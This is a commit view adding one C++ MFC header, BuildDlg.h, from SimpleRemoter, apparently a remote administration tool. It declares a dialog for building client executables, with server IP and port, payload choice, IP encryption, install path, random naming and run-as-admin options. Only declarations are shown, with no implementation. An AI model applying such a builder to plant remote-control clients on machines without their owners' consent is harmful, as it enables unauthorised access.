Init: Migrate SimpleRemoter (Since v1.3.1) to Gitea
This commit is contained in:
74
server/2015Remote/BuildDlg.h
Normal file
74
server/2015Remote/BuildDlg.h
Normal file
@@ -0,0 +1,74 @@
|
||||
#pragma once
|
||||
|
||||
#include "Buffer.h"
|
||||
#include "LangManager.h"
|
||||
|
||||
LPBYTE ReadResource(int resourceId, DWORD& dwSize);
|
||||
|
||||
std::string ReleaseEXE(int resID, const char* name);
|
||||
|
||||
CString BuildPayloadUrl(const char* ip, const char* name);
|
||||
|
||||
// CBuildDlg 对话框
|
||||
|
||||
class CBuildDlg : public CDialogLang
|
||||
{
|
||||
DECLARE_DYNAMIC(CBuildDlg)
|
||||
|
||||
public:
|
||||
CBuildDlg(CWnd* pParent = NULL); // 标准构造函数
|
||||
virtual ~CBuildDlg();
|
||||
|
||||
// 对话框数据
|
||||
enum { IDD = IDD_DIALOG_BUILD };
|
||||
CMenu m_MainMenu;
|
||||
BOOL m_runasAdmin;
|
||||
|
||||
protected:
|
||||
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
|
||||
CString GetFilePath(CString type, CString filter, BOOL isOpen = TRUE);
|
||||
BOOL OnToolTipNotify(UINT id, NMHDR* pNMHDR, LRESULT* pResult);
|
||||
|
||||
DECLARE_MESSAGE_MAP()
|
||||
public:
|
||||
CString m_strIP;
|
||||
CString m_strPort;
|
||||
afx_msg void OnBnClickedOk();
|
||||
virtual BOOL OnInitDialog();
|
||||
CComboBox m_ComboExe;
|
||||
|
||||
afx_msg void OnCbnSelchangeComboExe();
|
||||
CStatic m_OtherItem;
|
||||
CComboBox m_ComboBits;
|
||||
CComboBox m_ComboRunType;
|
||||
CComboBox m_ComboProto;
|
||||
CComboBox m_ComboEncrypt;
|
||||
afx_msg void OnHelpParameters();
|
||||
CComboBox m_ComboCompress;
|
||||
CString m_strFindden;
|
||||
afx_msg void OnHelpFindden();
|
||||
CEdit m_EditGroup;
|
||||
CString m_sGroupName;
|
||||
CString m_strEncryptIP;
|
||||
afx_msg void OnMenuEncryptIp();
|
||||
afx_msg void OnClientRunasAdmin();
|
||||
CComboBox m_ComboPayload;
|
||||
afx_msg void OnCbnSelchangeComboCompress();
|
||||
CStatic m_StaticPayload;
|
||||
CSliderCtrl m_SliderClientSize;
|
||||
CEdit m_EditInstallDir;
|
||||
CEdit m_EditInstallName;
|
||||
CString m_sInstallDir;
|
||||
CString m_sInstallName;
|
||||
afx_msg void OnEnChangeEditInstallDir();
|
||||
afx_msg void OnEnChangeEditInstallName();
|
||||
afx_msg void OnEnKillfocusEditInstallDir();
|
||||
afx_msg void OnEnKillfocusEditInstallName();
|
||||
afx_msg void OnRandomName();
|
||||
CButton m_BtnFileServer;
|
||||
CStatic m_StaticDownload;
|
||||
CEdit m_EditDownloadUrl;
|
||||
CString m_sDownloadUrl;
|
||||
afx_msg void OnBnClickedCheckFileserver();
|
||||
afx_msg void OnCbnSelchangeComboPayload();
|
||||
};
|
||||
Reference in New Issue
Block a user